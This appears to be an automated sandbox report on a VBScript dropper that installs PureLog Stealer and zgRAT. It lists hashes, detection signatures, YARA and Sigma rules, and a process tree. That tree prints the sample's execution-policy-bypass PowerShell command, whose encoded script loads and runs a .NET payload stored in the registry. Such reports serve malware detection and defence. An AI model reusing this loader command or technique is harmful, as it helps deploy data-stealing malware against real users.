Edit tour
Windows
Analysis Report
nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs
Overview
General Information
| Sample name: | nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsrenamed because original name is a hash value |
| Original sample name: | nostanas dokuments rinam Nr.52-FK-24.vbs |
| Analysis ID: | 1533048 |
| MD5: | 1f158aaa048de08d758d4ed4d65be651 |
| SHA1: | 7f443dad2bd9e472e96161979f8f628b9c5232a2 |
| SHA256: | 453f9f1860d49936a81140bc75488afdf01dfc5d4f23671c177a9310471b4b08 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
PureLog Stealer, zgRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 3552 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\nos#U 016bt#U012 b#U0161ana s dokument s r#U0113# U0137inam Nr.52-FK-2 4.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6500 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noexit -e xec bypass -window 1 -enc IAAk AHQAZQB4AH QAIAA9ACAA KAAoAEcAZQ B0AC0ASQB0 AGUAbQBQAH IAbwBwAGUA cgB0AHkAIA BIAEsAQwBV ADoAXABTAG 8AZgB0AHcA YQByAGUAXA BOAFkAQQBO AHgAQwBBAF QAXAApAC4A TgBZAEEATg B4AEMAQQBU ACkAOwAgAC QAdABlAHgA dAAgAD0AIA AtAGoAbwBp AG4AIAAkAH QAZQB4AHQA WwAtADEALg AuAC0AJAB0 AGUAeAB0AC 4ATABlAG4A ZwB0AGgAXQ A7ACAAWwBB AHAAcABEAG 8AbQBhAGkA bgBdADoAOg BDAHUAcgBy AGUAbgB0AE QAbwBtAGEA aQBuAC4ATA BvAGEAZAAo AFsAQwBvAG 4AdgBlAHIA dABdADoAOg BGAHIAbwBt AEIAYQBzAG UANgA0AFMA dAByAGkAbg BnACgAJAB0 AGUAeAB0AC kAKQAuAEUA bgB0AHIAeQ BQAG8AaQBu AHQALgBJAG 4AdgBvAGsA ZQAoACQATg B1AGwAbAAs ACQATgB1AG wAbAApADsA MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 6448 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
CasPol.exe (PID: 1876 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\C aspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF) - CasPol.exe (PID: 4832 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\C aspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF) - CasPol.exe (PID: 6416 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\C aspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF) - CasPol.exe (PID: 6120 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\C aspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF) - CasPol.exe (PID: 5352 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\C aspol.exe" MD5: C91C5994E9C0F1690C296B57DFCD2EDF)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
| Click to see the 3 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||